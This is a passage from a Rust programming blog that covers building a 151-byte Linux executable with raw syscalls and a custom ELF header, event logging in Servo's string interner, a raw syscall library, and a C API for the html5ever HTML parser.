<a href="https://github.com/rust-lang/rust/pull/16970">issues</a> along the way, I ended
up with a 151-byte, statically linked executable for AMD64 Linux. With the
<a href="http://blog.rust-lang.org/2015/01/09/Rust-1.0-alpha.html">release of Rust
1.0-alpha</a>, it's time
to show this off.</p>
<p>Here's the Rust code:</p>
<pre class='rust '>
<span class='attribute'>#<span class='op'>!</span>[<span class='ident'>crate_type</span><span class='op'>=</span><span class='string'>"rlib"</span>]</span>
<span class='attribute'>#<span class='op'>!</span>[<span class='ident'>allow</span>(<span class='ident'>unstable</span>)]</span>
<span class='attribute'>#[<span class='ident'>macro_use</span>]</span> <span class='kw'>extern</span> <span class='kw'>crate</span> <span class='ident'>syscall</span>;
<span class='kw'>use</span> <span class='ident'>std</span>::<span class='ident'>intrinsics</span>;
<span class='kw'>fn</span> <span class='ident'>exit</span>(<span class='ident'>n</span>: <span class='ident'>usize</span>) <span class='op'>-></span> <span class='op'>!</span> {
<span class='kw'>unsafe</span> {
<span class='macro'>syscall</span><span class='macro'>!</span>(<span class='ident'>EXIT</span>, <span class='ident'>n</span>);
<span class='ident'>intrinsics</span>::<span class='ident'>unreachable</span>()
}
}
<span class='kw'>fn</span> <span class='ident'>write</span>(<span class='ident'>fd</span>: <span class='ident'>usize</span>, <span class='ident'>buf</span>: <span class='kw-2'>&</span>[<span class='ident'>u8</span>]) {
<span class='kw'>unsafe</span> {
<span class='macro'>syscall</span><span class='macro'>!</span>(<span class='ident'>WRITE</span>, <span class='ident'>fd</span>, <span class='ident'>buf</span>.<span class='ident'>as_ptr</span>(), <span class='ident'>buf</span>.<span class='ident'>len</span>());
}
}
<span class='attribute'>#[<span class='ident'>no_mangle</span>]</span>
<span class='kw'>pub</span> <span class='kw'>fn</span> <span class='ident'>main</span>() {
<span class='ident'>write</span>(<span class='number'>1</span>, <span class='string'>"Hello!\n"</span>.<span class='ident'>as_bytes</span>());
<span class='ident'>exit</span>(<span class='number'>0</span>);
}
</pre>
<p>This uses my <a href="https://crates.io/crates/syscall">syscall library</a>, which
provides the <code>syscall!</code> macro. We wrap the underlying system calls with Rust
functions, each exposing a safe interface to the
<a href="http://doc.rust-lang.org/book/unsafe.html">unsafe</a> <code>syscall!</code> macro. The
<code>main</code> function uses these two safe functions and doesn't need its own <code>unsafe</code>
annotation. Even in such a small program, Rust allows us to isolate memory
unsafety to a subset of the code.</p>
<p>Because of <code>crate_type="rlib"</code>, rustc will build this as a static library, from
which we extract a single object file <code>tinyrust.o</code>:</p>
<pre><code class="language-text">$ rustc tinyrust.rs \
-O -C no-stack-check -C relocation-model=static \
-L syscall.rs/target
$ ar x libtinyrust.rlib tinyrust.o
$ objdump -dr tinyrust.o
0000000000000000 <main>:
0: b8 01 00 00 00 mov $0x1,%eax
5: bf 01 00 00 00 mov $0x1,%edi
a: be 00 00 00 00 mov $0x0,%esi
b: R_X86_64_32 .rodata.str1625
f: ba 07 00 00 00 mov $0x7,%edx
14: 0f 05 syscall
16: b8 3c 00 00 00 mov $0x3c,%eax
1b: 31 ff xor %edi,%edi
1d: 0f 05 syscall
</code></pre>
<p>We disable stack exhaustion checking, as well as position-independent code, in
order to slim down the output. After optimization, the only instructions that
survive come from <a href="https://github.com/kmcallister/syscall.rs/blob/master/src/platform/linux-x86_64/mod.rs">inline assembly blocks in the syscall
library</a>.</p>
<p>Note that <code>main</code> doesn't end in a <code>ret</code> instruction. The <code>exit</code> function
(which gets inlined) is marked with a "return type" of <code>!</code>, meaning <a href="http://doc.rust-lang.org/reference.html#diverging-functions">"doesn't
return"</a>. We make
good on this by invoking the <a href="http://llvm.org/docs/LangRef.html#unreachable-instruction"><code>unreachable</code>
intrinsic</a> after
<code>syscall!</code>. <a href="http://llvm.org">LLVM</a> will optimize under the assumption that we
can never reach this point, making no guarantees about the program behavior if
it is reached. This represents the fact that the kernel is actually going to
kill the process before <code>syscall!(EXIT, n)</code> can return.</p>
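<p>The <code>!</code> type isn't specific to intrinsics: any diverging function can declare it, and the compiler lets a diverging call stand in for a value of any type. A small self-contained sketch, using <code>panic!</code> in place of a raw exit so it runs on any Rust build:</p>

```rust
// A diverging function: the "return type" `!` promises control never comes back.
fn fail(msg: &str) -> ! {
    panic!("{}", msg);
}

fn checked_div(a: u32, b: u32) -> u32 {
    if b == 0 {
        // No `else` value needed: a call that returns `!` coerces to u32.
        fail("division by zero");
    }
    a / b
}

fn main() {
    assert_eq!(checked_div(10, 2), 5);
    println!("ok");
}
```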
<p>Because we use inline assembly and intrinsics, this code is not going to work
on a <a href="http://blog.rust-lang.org/2014/10/30/Stability.html">stable-channel
build</a> of Rust 1.0. It
will require an alpha or nightly build until such time as inline assembly and
<code>intrinsics::unreachable</code> are added to the stable language of Rust 1.x.</p>
<p>Note that I didn't even use <code>#![no_std]</code>! This program is so tiny that
everything it pulls from libstd is a type definition, macro, or fully inlined
function. As a result there's nothing of libstd left in the compiler output.
In a larger program you may need <code>#![no_std]</code>, although its role is <a href="https://github.com/rust-lang/rust/issues/20537">greatly
reduced</a> following the <a href="https://github.com/rust-lang/rust/pull/19654">removal
of Rust's runtime</a>.</p>
<h1 id="linking" class='section-header'>Linking</h1>
<p>This is where things get weird.</p>
<p>Whether we compile from C or Rust,<sup id="fnref3"><a href="#fn3" rel="footnote">3</a></sup> the standard linker toolchain is
going to include a bunch of junk we don't need. So I cooked up my own <a href="https://sourceware.org/binutils/docs/ld/Scripts.html">linker
script</a>:</p>
<pre><code class="language-text">SECTIONS {
. = 0x400078;
combined . : AT(0x400078) ALIGN(1) SUBALIGN(1) {
*(.text*)
*(.data*)
*(.rodata*)
*(.bss*)
}
}
</code></pre>
<p>We smash all the sections together, with no alignment padding, then extract
that section as a headerless binary blob:</p>
<pre><code class="language-text">$ ld --gc-sections -e main -T script.ld -o payload tinyrust.o
$ objcopy -j combined -O binary payload payload.bin
</code></pre>
<p>Finally we stick this on the end of a custom ELF header. The header is written
in <a href="http://www.nasm.us/">NASM</a> syntax but contains no instructions, only data
fields. The base address <code>0x400078</code> seen above is the end of this header, when
the whole file is loaded at <code>0x400000</code>. There's no guarantee that <code>ld</code> will
put <code>main</code> at the beginning of the file, so we need to separately determine the
address of <code>main</code> and fill that in as the <code>e_entry</code> field in the ELF file
header.</p>
<pre><code class="language-text">$ ENTRY=$(nm -f posix payload | grep '^main ' | awk '{print $3}')
$ nasm -f bin -o tinyrust -D entry=0x$ENTRY elf.s
$ chmod +x ./tinyrust
$ ./tinyrust
Hello!
</code></pre>
<p>It works! And the size:</p>
<pre><code class="language-text">$ wc -c < tinyrust
158
</code></pre>
<p>Seven bytes too big!</p>
<h1 id="the-final-trick" class='section-header'>The final trick</h1>
<p>To get down to 151 bytes, I took inspiration from <a href="http://www.muppetlabs.com/%7Ebreadbox/software/tiny/teensy.html">this classic
article</a>, which
observes that padding fields in the ELF header can be used to store other data.
Like, say, <a href="https://github.com/kmcallister/tiny-rust-demo/blob/97975946aad62625c28d053c2396ee5d2609a90c/elf.s#L11-L12">a string
constant</a>.
The Rust code changes to access this constant:</p>
<pre class='rust '>
<span class='kw'>use</span> <span class='ident'>std</span>::{<span class='ident'>mem</span>, <span class='ident'>raw</span>};
<span class='attribute'>#[<span class='ident'>no_mangle</span>]</span>
<span class='kw'>pub</span> <span class='kw'>fn</span> <span class='ident'>main</span>() {
<span class='kw'>let</span> <span class='ident'>message</span>: <span class='kw-2'>&</span><span class='lifetime'>'static</span> [<span class='ident'>u8</span>] <span class='op'>=</span> <span class='kw'>unsafe</span> {
<span class='ident'>mem</span>::<span class='ident'>transmute</span>(<span class='ident'>raw</span>::<span class='ident'>Slice</span> {
<span class='ident'>data</span>: <span class='number'>0x00400008</span> <span class='kw'>as</span> <span class='op'>*</span><span class='kw'>const</span> <span class='ident'>u8</span>,
<span class='ident'>len</span>: <span class='number'>7</span>,
})
};
<span class='ident'>write</span>(<span class='number'>1</span>, <span class='ident'>message</span>);
<span class='ident'>exit</span>(<span class='number'>0</span>);
}
</pre>
<p>A Rust <a href="http://doc.rust-lang.org/book/arrays-vectors-and-slices.html">slice</a>
like <code>&[u8]</code> consists of a pointer to some memory, and a length indicating the
number of elements that may be found there. The module
<a href="http://doc.rust-lang.org/std/raw/index.html"><code>std::raw</code></a> exposes this as an
ordinary struct that we build, then
<a href="http://doc.rust-lang.org/std/mem/fn.transmute.html">transmute</a> to the actual
slice type. The <code>transmute</code> function generates no code; it just tells the type
checker to treat our <code>raw::Slice<u8></code> as if it were a <code>&[u8]</code>. We return this
value out of the <code>unsafe</code> block, taking advantage of the "everything is an
expression" syntax, and then print the message as before.</p>
<p>Trying out the new version:</p>
<pre><code class="language-text">$ rustc tinyrust.rs \
-O -C no-stack-check -C relocation-model=static \
-L syscall.rs/target
$ ar x libtinyrust.rlib tinyrust.o
$ objdump -dr tinyrust.o
0000000000000000 <main>:
0: b8 01 00 00 00 mov $0x1,%eax
5: bf 01 00 00 00 mov $0x1,%edi
a: be 08 00 40 00 mov $0x400008,%esi
f: ba 07 00 00 00 mov $0x7,%edx
14: 0f 05 syscall
16: b8 3c 00 00 00 mov $0x3c,%eax
1b: 31 ff xor %edi,%edi
1d: 0f 05 syscall
...
$ wc -c < tinyrust
151
$ ./tinyrust
Hello!
</code></pre>
<p>The object code is the same as before, except that the relocation for the
string constant has become an absolute address. The binary is smaller by 7
bytes (the size of <code>"Hello!\n"</code>) and it still works!</p>
<p>You can find the full code <a href="https://github.com/kmcallister/tiny-rust-demo">on
GitHub</a>. The code in this article
works on rustc 1.0.0-dev (44a287e6e 2015-01-08). If I update the code on GitHub,
I will also update the version number printed by the included build script.</p>
<p>I'd be curious to hear if anyone can make my program smaller!</p>
<div class="footnotes">
<hr>
<ol>
<li id="fn1">
<p>C is not really "bare metal", but that's <a href="http://blog.llvm.org/2011/05/what-every-c-programmer-should-know.html">another story</a>. <a href="#fnref1" rev="footnote">↩</a></p>
</li>
<li id="fn2">
<p>From a pure language perspective. If you want to talk about availability of compilers and libraries, then Rust still has a <em>bit</em> of a disadvantage ;) <a href="#fnref2" rev="footnote">↩</a></p>
</li>
<li id="fn3">
<p>In fact, this code grew out of an earlier experiment with really small binaries in C. <a href="#fnref3" rev="footnote">↩</a></p>
</li>
</ol>
</div>
<h2>A taste of Rust (yum) for C/C++ programmers (2014-10-29)</h2>
<p>If, like me,
you've been frustrated with the status quo in systems languages,
this article will give you a taste of why Rust is so exciting.
In a tiny amount of code,
it shows a lot of ways that Rust really kicks ass compared to C and C++.
It's not just safe and fast,
it's a lot more convenient.</p>
<p>Web browsers do <a href="http://en.wikipedia.org/wiki/String_interning">string interning</a>
to condense the strings that make up the Web,
such as tag and attribute names,
into small values that can be compared quickly.
I recently added
event logging support to
<a href="https://github.com/servo/servo">Servo</a>'s string interner.
This will allow us
to record traces from real websites,
which we can use
to guide further optimizations.</p>
<p>Here are the events we can log:</p>
<pre class='rust '>
<span class='attribute'>#[<span class='ident'>deriving</span>(<span class='ident'>Show</span>)]</span>
<span class='kw'>pub</span> <span class='kw'>enum</span> <span class='ident'>Event</span> {
<span class='ident'>Intern</span>(<span class='ident'>u64</span>),
<span class='ident'>Insert</span>(<span class='ident'>u64</span>, <span class='ident'>String</span>),
<span class='ident'>Remove</span>(<span class='ident'>u64</span>),
}
</pre>
<p>Interned strings have a 64-bit ID,
which is recorded in every event.
The <a href="http://doc.rust-lang.org/std/string/struct.String.html"><code>String</code></a>
we store for "insert" events
is like C++'s <code>std::string</code>;
it points to a buffer in the heap,
and it owns that buffer.</p>
<p>This <a href="http://doc.rust-lang.org/guide.html#enums"><code>enum</code></a> is a bit fancier than a C <code>enum</code>,
but its representation in memory
is no more complex than a C <code>struct</code>.
There's a tag for the three alternatives,
a 64-bit ID,
and a few fields that make up the <code>String</code>.
When we pass or return an <code>Event</code> by value,
it's at worst a <code>memcpy</code>
of a few dozen bytes.
There's no implicit heap allocation,
garbage collection,
or anything like that.
We didn't define a way to copy an event;
this means the <code>String</code> buffer
always has a unique owner
who is responsible for freeing it.</p>
<p>The <code>deriving(Show)</code> attribute
tells the compiler to <a href="http://doc.rust-lang.org/reference.html#deriving">auto-generate</a>
a text representation,
so we can print an <code>Event</code>
just as easily as a built-in type.</p>
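<p>You can see concretely that <code>Event</code> is a flat value type by checking its size with <code>std::mem::size_of</code>. (In today's Rust the attribute is spelled <code>#[derive(Debug)]</code> rather than <code>#[deriving(Show)]</code>; this sketch uses the modern form.)</p>

```rust
use std::mem;

#[derive(Debug)]
pub enum Event {
    Intern(u64),
    Insert(u64, String),
    Remove(u64),
}

fn main() {
    // One tag plus the largest payload (a u64 and String's three words):
    // a few dozen bytes, and no heap allocation for the enum itself.
    let sz = mem::size_of::<Event>();
    assert!(sz >= mem::size_of::<u64>());
    println!("Event is {} bytes; {:?}", sz, Event::Insert(1, String::from("foo")));
}
```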
<p>Next we declare a global vector of events,
protected by a mutex:</p>
<pre class='rust '>
<span class='macro'>lazy_static</span><span class='macro'>!</span> {
<span class='kw'>pub</span> <span class='kw'>static</span> <span class='kw-2'>ref</span> <span class='ident'>LOG</span>: <span class='ident'>Mutex</span><span class='op'><</span><span class='ident'>Vec</span><span class='op'><</span><span class='ident'>Event</span><span class='op'>>></span>
<span class='op'>=</span> <span class='ident'>Mutex</span>::<span class='ident'>new</span>(<span class='ident'>Vec</span>::<span class='ident'>with_capacity</span>(<span class='number'>50_000</span>));
}
</pre>
<p><code>lazy_static!</code> will initialize both the mutex and the vector
when <code>LOG</code> is first used.
Like <code>String</code>, the <code>Vec</code> is a growable buffer.
We won't turn on event logging in release builds,
so it's fine to pre-allocate space for 50,000 events.
(You can put underscores
anywhere in an integer literal
to improve readability.)</p>
<p><code>lazy_static!</code>, <code>Mutex</code>, and <code>Vec</code> are all implemented
in Rust
using gnarly low-level code.
But the amazing thing
is that all three expose a safe interface.
It's simply not possible
to use the variable before it's initialized,
or to read the value the <code>Mutex</code> protects without locking it,
or to modify the vector while iterating over it.</p>
<p>The worst you can do is deadlock.
Rust still considers that pretty bad,
which is why it discourages global state.
But it's clearly what we need here.
Rust takes a pragmatic approach to safety.
You can always write <a href="http://doc.rust-lang.org/reference.html#unsafety">the <code>unsafe</code> keyword</a>
and then use the same pointer tricks
you'd use in C.
But you don't need to be quite so guarded
when writing the other 95% of your code.
I want a language that assumes I'm brilliant but distracted :)</p>
<p>Rust catches these mistakes at compile time,
and produces the same code you'd see
with equivalent constructs in C++.
For a more in-depth comparison,
see Ruud van Asseldonk's
<a href="http://ruudvanasseldonk.com/2014/08/10/writing-a-path-tracer-in-rust-part-1">excellent series of articles</a>
about porting a spectral path tracer from C++ to Rust.
The Rust code <a href="http://ruudvanasseldonk.com/2014/10/20/writing-a-path-tracer-in-rust-part-7-conclusion">performs</a> basically the same as
Clang / GCC / MSVC on the same platform.
Not surprising,
because Rust uses <a href="http://llvm.org/">LLVM</a>
and benefits from
the same backend optimizations as Clang.</p>
<p><code>lazy_static!</code> is not a built-in language feature;
it's a <a href="http://doc.rust-lang.org/guide-macros.html">macro</a> provided by
<a href="https://github.com/Kimundi/lazy-static.rs">a third-party library</a>.
Since the library uses <a href="http://doc.crates.io/">Cargo</a>,
I can include it in my project by adding</p>
<pre><code class="language-toml">[dependencies.lazy_static]
git = "https://github.com/Kimundi/lazy-static.rs"
</code></pre>
<p>to <code>Cargo.toml</code> and then adding</p>
<pre class='rust '>
<span class='attribute'>#[<span class='ident'>phase</span>(<span class='ident'>plugin</span>)]</span>
<span class='kw'>extern</span> <span class='kw'>crate</span> <span class='ident'>lazy_static</span>;
</pre>
<p>to <code>src/lib.rs</code>.
Cargo will automatically fetch and build all dependencies.
Code reuse becomes no harder
than in your favorite scripting language.</p>
<p>Finally, we define a function
that pushes a new event onto the vector:</p>
<pre class='rust '>
<span class='kw'>pub</span> <span class='kw'>fn</span> <span class='ident'>log</span>(<span class='ident'>e</span>: <span class='ident'>Event</span>) {
<span class='ident'>LOG</span>.<span class='ident'>lock</span>().<span class='ident'>push</span>(<span class='ident'>e</span>);
}
</pre>
<p><code>LOG.lock()</code> produces an
<a href="http://en.wikipedia.org/wiki/Resource_Acquisition_Is_Initialization">RAII</a> handle
that will automatically unlock the mutex
when it falls out of scope.
In C++ I always hesitate to use temporaries like this
because if they're destroyed too soon,
my program will segfault or worse.
Rust has compile-time <a href="http://doc.rust-lang.org/guide-lifetimes.html">lifetime checking</a>,
so I can do things that <a href="http://www.randomhacks.net/2014/09/19/rust-lifetimes-reckless-cxx/">would be reckless</a> in C++.</p>
<p>If you scroll up you'll see
a lot of prose and not a lot of code.
That's because I got
a huge amount of functionality for free.
Here's the logging module again:</p>
<pre class='rust '>
<span class='attribute'>#[<span class='ident'>deriving</span>(<span class='ident'>Show</span>)]</span>
<span class='kw'>pub</span> <span class='kw'>enum</span> <span class='ident'>Event</span> {
<span class='ident'>Intern</span>(<span class='ident'>u64</span>),
<span class='ident'>Insert</span>(<span class='ident'>u64</span>, <span class='ident'>String</span>),
<span class='ident'>Remove</span>(<span class='ident'>u64</span>),
}
<span class='macro'>lazy_static</span><span class='macro'>!</span> {
<span class='kw'>pub</span> <span class='kw'>static</span> <span class='kw-2'>ref</span> <span class='ident'>LOG</span>: <span class='ident'>Mutex</span><span class='op'><</span><span class='ident'>Vec</span><span class='op'><</span><span class='ident'>Event</span><span class='op'>>></span>
<span class='op'>=</span> <span class='ident'>Mutex</span>::<span class='ident'>new</span>(<span class='ident'>Vec</span>::<span class='ident'>with_capacity</span>(<span class='number'>50_000</span>));
}
<span class='kw'>pub</span> <span class='kw'>fn</span> <span class='ident'>log</span>(<span class='ident'>e</span>: <span class='ident'>Event</span>) {
<span class='ident'>LOG</span>.<span class='ident'>lock</span>().<span class='ident'>push</span>(<span class='ident'>e</span>);
}
</pre>
<p>This goes in <code>src/event.rs</code>
and we include it from <code>src/lib.rs</code>.</p>
<pre class='rust '>
<span class='attribute'>#[<span class='ident'>cfg</span>(<span class='ident'>feature</span> <span class='op'>=</span> <span class='string'>"log-events"</span>)]</span>
<span class='kw'>pub</span> <span class='kw'>mod</span> <span class='ident'>event</span>;
</pre>
<p>The <a href="http://doc.rust-lang.org/reference.html#conditional-compilation"><code>cfg</code> attribute</a>
is how Rust does conditional compilation. Another project can specify</p>
<pre><code class="language-toml">[dependencies.string_cache]
git = "https://github.com/servo/string-cache"
features = ["log-events"]
</code></pre>
<p>and add code to dump the log:</p>
<pre class='rust '>
<span class='kw'>for</span> <span class='ident'>e</span> <span class='kw'>in</span> <span class='ident'>string_cache</span>::<span class='ident'>event</span>::<span class='ident'>LOG</span>.<span class='ident'>lock</span>().<span class='ident'>iter</span>() {
<span class='macro'>println</span><span class='macro'>!</span>(<span class='string'>"{}"</span>, <span class='ident'>e</span>);
}
</pre>
<p>Any project which doesn't opt in to <code>log-events</code>
will see zero impact from any of this.</p>
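<p>The <code>cfg</code> attribute works on any item, and the check happens entirely at compile time. A tiny illustration that needs no Cargo features, using the built-in <code>target_pointer_width</code> predicate:</p>

```rust
// Only one of these two definitions is compiled into the program.
#[cfg(target_pointer_width = "64")]
fn pointer_width() -> usize { 8 }

#[cfg(not(target_pointer_width = "64"))]
fn pointer_width() -> usize { std::mem::size_of::<usize>() }

fn main() {
    assert_eq!(pointer_width(), std::mem::size_of::<usize>());
}
```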
<p>If you'd like to learn Rust,
the <a href="http://doc.rust-lang.org/guide.html">Guide</a> is a good place to start.
We're getting <a href="http://blog.rust-lang.org/2014/09/15/Rust-1.0.html">close to 1.0</a>
and the important concepts have been stable for a while,
but the details of syntax and libraries are still in flux.
It's not too early to learn,
but it might be too early to maintain a large library.</p>
<p>By the way,
here are the events generated by
interning the three strings
<code>foobarbaz</code> <code>foo</code> <code>blockquote</code>:</p>
<pre><code class="language-text">Insert(0x7f1daa023090, foobarbaz)
Intern(0x7f1daa023090)
Intern(0x6f6f6631)
Intern(0xb00000002)
</code></pre>
<p>There are
three different kinds of IDs,
indicated by the least significant bits.
The first is a pointer
into a standard interning table,
which is protected by a mutex.
The other two are created without synchronization,
which improves parallelism
between parser threads.</p>
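<p>A toy model of this tagging scheme, with the caveat that the real encoding lives in string-cache and may differ in detail: the low bits of the <code>u64</code> select the kind, and the remaining bits are the payload.</p>

```rust
// Hypothetical decoder for the low-bit tags seen in the log above.
fn kind(id: u64) -> &'static str {
    match id & 0b11 {
        0 => "dynamic (pointer into the interning table)",
        1 => "inline (characters stored in the id itself)",
        _ => "static (index into the well-known-string list)",
    }
}

fn main() {
    assert!(kind(0x7f1daa023090).starts_with("dynamic"));
    assert!(kind(0x6f6f6631).starts_with("inline"));
    assert!(kind(0xb00000002).starts_with("static"));
}
```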
<p>In UTF-8,
the string <code>foo</code>
is smaller than a 64-bit pointer,
so we store the characters directly.
<code>blockquote</code> is too big for that,
but it corresponds to a well-known HTML tag.
<code>0xb</code> is the index of <code>blockquote</code> in
<a href="https://github.com/servo/string-cache/blob/master/macros/src/atom/data.rs">a static list</a>
of strings that are common
on the Web.
Static atoms
can also be used
<a href="https://github.com/servo/string-cache/blob/09a935e64248ca70bd6da12f9760a0fec9ea43fd/src/atom.rs#L533-L552">in pattern matching</a>, and
LLVM's optimizations
for C's <code>switch</code> statements will apply.</p>
<h2>Raw system calls for Rust (2014-09-17)</h2>
<p>I wrote <a href="https://github.com/kmcallister/syscall.rs">a small library</a> for making raw system calls from Rust programs. It provides a macro that expands into in-line system call instructions, with no run-time dependencies at all. Here's an example:</p>
<pre class="sourceCode rust"><code class="sourceCode rust"><span class="st">#![feature(phase)]</span>
<span class="st">#[phase(plugin, link)]</span>
<span class="kw">extern crate</span> syscall;
<span class="kw">fn</span> write(fd: <span class="dt">uint</span>, buf: <span class="ot">&</span>[<span class="dt">u8</span>]) {
<span class="kw">unsafe</span> {
syscall!(WRITE, fd, buf.as_ptr(), buf.len());
}
}
<span class="kw">fn</span> main() {
write(1, <span class="st">"Hello, world!\n"</span>.as_bytes());
}</code></pre>
<p>Right now it only supports x86-64 Linux, but I'd love to add other platforms. Pull requests are much appreciated. :)</p>
<h2>Calling a Rust library from C (or anything else!) (2014-08-27)</h2>
<p>One reason I'm excited about <a href="http://www.rust-lang.org/">Rust</a> is that I can compile Rust code to a simple native-code library, without heavy runtime dependencies, and then call it from any language. Imagine writing performance-critical extensions for Python, Ruby, or Node in a safe, pleasant language that has <a href="http://doc.rust-lang.org/guide-lifetimes.html">static lifetime checking</a>, <a href="http://doc.rust-lang.org/tutorial.html#pattern-matching">pattern matching</a>, a <a href="http://doc.rust-lang.org/guide-macros.html">real macro system</a>, and other goodies like that. For this reason, when I started <a href="https://github.com/kmcallister/html5ever">html5ever</a> some six months ago, I wanted it to be more than another "Foo for BarLang" project. I want it to be <em>the</em> HTML parser of choice, for a wide variety of applications in any language.</p>
<p>Today I started work in earnest on the C API for html5ever. In only a few hours I had a working demo. And this is a fairly complicated library, with 5,000+ lines of code incorporating</p>
<ul class="incremental">
<li>most of the <a href="http://www.whatwg.org/specs/web-apps/current-work/multipage/syntax.html">hilariously complicated parsing rules</a> in the HTML spec,</li>
<li>a <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/macros/src/match_token.rs">Rust syntax extension</a> for writing parse rules in a concise form that matches the spec,</li>
<li>compile-time <a href="https://github.com/sfackler/rust-phf">perfect hash maps</a> for string interning and named characters, and</li>
<li>lots and lots of generic code — if this library were written in C++, almost all of it would be in header files.</li>
</ul>
<p>It's pretty cool that we can use all this machinery from C, or any language that can call C. I'll describe first how to build and use the library, and then I'll talk about the implementation of the C API.</p>
<p>html5ever (for C or for Rust) is not finished yet, but if you're feeling adventurous, you are welcome to try it out! And I'd love to have more contributors. Let me know <a href="https://github.com/kmcallister/html5ever/issues">on GitHub</a> about any issues you run into.</p>
<h1 id="using-html5ever-from-c">Using html5ever from C</h1>
<p>Like most Rust libraries, html5ever builds with <a href="http://crates.io/">Cargo</a>.</p>
<pre><code>$ git clone https://github.com/kmcallister/html5ever
$ cd html5ever
$ git checkout dev
$ cargo build
Updating git repository `https://github.com/sfackler/rust-phf`
Compiling phf_mac v0.0.0 (https://github.com/sfackler/rust-phf#f21e2a41)
Compiling html5ever-macros v0.0.0 (file:///tmp/html5ever)
Compiling phf v0.0.0 (https://github.com/sfackler/rust-phf#f21e2a41)
Compiling html5ever v0.0.0 (file:///tmp/html5ever)</code></pre>
<p>The C API isn't Cargo-ified yet, so we'll build it using the older Makefile-based system.</p>
<pre><code>$ mkdir build
$ cd build
$ ../configure
$ make libhtml5ever_for_c.a
rustc -D warnings -C rpath -L /tmp/html5ever/target -L /tmp/html5ever/target/deps \
-o libhtml5ever_for_c.a --cfg for_c --crate-type staticlib /tmp/html5ever/src/lib.rs
warning: link against the following native artifacts when linking against this static library
note: the order and any duplication can be significant on some platforms, and so may need to be preserved
note: library: rt
note: library: dl
note: library: pthread
note: library: gcc_s
note: library: pthread
note: library: c
note: library: m</code></pre>
<p>Now we can build an <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/examples/capi/tokenize.c">example C program</a> using that library, and following the link instructions produced by <code>rustc</code>.</p>
<pre><code>$ H5E_PATH=/tmp/html5ever
$ gcc -Wall -o tokenize tokenize.c -I $H5E_PATH/capi -L $H5E_PATH/build \
-lhtml5ever_for_c -lrt -ldl -lpthread -lgcc_s -lpthread -lc -lm
$ ./tokenize 'Hello&comma; <i class=excellent>world!</i>'
CHARS : Hello
CHARS : ,
CHARS :
TAG : <i>
ATTR: class="excellent"
CHARS : world!
TAG : </i></code></pre>
<p>The build process is pretty standard for C; we just link a <code>.a</code> file and its dependencies. The biggest obstacle right now is that you won't find the Rust compiler in your distro's package manager, because the language is still changing so rapidly. But there's a ton of effort going into stabilizing the language for a Rust 1.0 release this year. It won't be too long before <code>rustc</code> is a reasonable build dependency.</p>
<p>Let's look at the C client code.</p>
<pre class="sourceCode c"><code class="sourceCode c"><span class="ot">#include <stdio.h></span>
<span class="ot">#include "html5ever.h"</span>
<span class="dt">void</span> put_str(<span class="dt">const</span> <span class="dt">char</span> *x) {
fputs(x, stdout);
}
<span class="dt">void</span> put_buf(<span class="kw">struct</span> h5e_buf text) {
fwrite(text.data, text.len, <span class="dv">1</span>, stdout);
}
<span class="dt">void</span> do_start_tag(<span class="dt">void</span> *user, <span class="kw">struct</span> h5e_buf name, <span class="dt">int</span> self_closing, size_t num_attrs) {
put_str(<span class="st">"TAG : <"</span>);
put_buf(name);
<span class="kw">if</span> (self_closing) {
putchar('/');
}
put_str(<span class="st">"></span><span class="ch">\n</span><span class="st">"</span>);
}
<span class="co">// ...</span>
<span class="kw">struct</span> h5e_token_ops ops = {
.do_chars = do_chars,
.do_start_tag = do_start_tag,
.do_tag_attr = do_tag_attr,
.do_end_tag = do_end_tag,
};
<span class="kw">struct</span> h5e_token_sink sink = {
.ops = &ops,
.user = NULL,
};
<span class="dt">int</span> main(<span class="dt">int</span> argc, <span class="dt">char</span> *argv[]) {
<span class="kw">if</span> (argc < <span class="dv">2</span>) {
printf(<span class="st">"Usage: %s 'HTML fragment'</span><span class="ch">\n</span><span class="st">"</span>, argv[<span class="dv">0</span>]);
<span class="kw">return</span> <span class="dv">1</span>;
}
<span class="kw">struct</span> h5e_tokenizer *tok = h5e_tokenizer_new(&sink);
h5e_tokenizer_feed(tok, h5e_buf_from_cstr(argv[<span class="dv">1</span>]));
h5e_tokenizer_end(tok);
h5e_tokenizer_free(tok);
<span class="kw">return</span> <span class="dv">0</span>;
}</code></pre>
<p>The <code>struct h5e_token_ops</code> contains pointers to callbacks. Any events we don't care to handle are left as NULL function pointers. Inside <code>main</code>, we create a tokenizer and feed it a string. html5ever for C uses a simple pointer+length representation of buffers, which is this <code>struct h5e_buf</code> you see being passed by value.</p>
<p>This demo only does tokenization, not tree construction. html5ever can perform both phases of parsing, but the API surface for tree construction is much larger and I didn't get around to writing C bindings yet.</p>
<h1 id="implementing-the-c-api">Implementing the C API</h1>
<p>Some parts of Rust's <a href="http://doc.rust-lang.org/std/index.html"><code>libstd</code></a> depend on runtime services, such as task-local data, that a C program may not have initialized. So the <a href="https://github.com/kmcallister/html5ever/commit/222affd0caa132eabb1f14f47b489c161f968b42">first step</a> in building a C API was to eliminate all <code>std::</code> imports. This isn't nearly as bad as it sounds, because large parts of <code>libstd</code> are just re-exports from other libraries like <a href="http://doc.rust-lang.org/core/index.html"><code>libcore</code></a> that we can use with no trouble. To be fair, I did write html5ever with the goal of a C API in mind, and I avoided features like threading that would be difficult to integrate. So your library might give you more trouble, depending on which Rust features you use.</p>
<p>The <a href="https://github.com/kmcallister/html5ever/commit/c30deff17923294c39890986099e3ead64be29e3">next step</a> was to add the <code>#![no_std]</code> crate attribute. This means we no longer import <a href="http://doc.rust-lang.org/std/prelude/index.html">the standard prelude</a> into every module. To compensate, I added <code>use core::prelude::*;</code> to most of my modules. This brings in <a href="http://doc.rust-lang.org/core/prelude/index.html">the parts of the prelude</a> that can be used without runtime system support. I also added many imports for ubiquitous types like <code>String</code> and <code>Vec</code>, which come from <code>libcollections</code>.</p>
